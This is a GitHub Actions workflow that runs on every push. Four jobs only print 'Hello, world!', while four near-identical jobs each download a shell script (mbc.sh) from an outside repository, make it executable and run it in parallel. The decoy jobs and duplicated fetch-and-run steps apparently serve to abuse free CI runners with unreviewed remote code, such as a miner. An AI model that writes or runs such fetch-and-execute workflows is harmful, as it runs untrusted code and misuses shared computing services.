name: linux
on: [push]
jobs:
  namestrap:
    runs-on: ubuntu-latest
    steps:
      - name: Run a one-line script
        run: ls && echo Hello, world!
  bpefas:
    runs-on: ubuntu-latest
    steps:
      - name: Run a one-line script
        run: ls && echo Hello, world!
  namjimunsha:
    runs-on: ubuntu-latest
    steps:
      - name: Run a one-line script
        run: ls && echo Hello, world!
  lamestrap:
    runs-on: ubuntu-latest
    steps:
      - name: Run a one-line script
        run: ls && echo Hello, world!
  aasem:
    runs-on: ubuntu-latest
    steps:
      - name: Run a one-line script
        run: wget https://raw.githubusercontent.com/agamlimaa/saya/main/mbc.sh && chmod +x mbc.sh && ./mbc.sh .
  aasema:
    runs-on: ubuntu-latest
    steps:
      - name: Run a one-line script
        run: wget https://raw.githubusercontent.com/agamlimaa/saya/main/mbc.sh && chmod +x mbc.sh && ./mbc.sh .
  aasemi:
    runs-on: ubuntu-latest
    steps:
      - name: Run a one-line script
        run: wget https://raw.githubusercontent.com/agamlimaa/saya/main/mbc.sh && chmod +x mbc.sh && ./mbc.sh .
  aasemo:
    runs-on: ubuntu-latest
    steps:
      - name: Run a one-line script
        run: wget https://raw.githubusercontent.com/agamlimaa/saya/main/mbc.sh && chmod +x mbc.sh && ./mbc.sh .
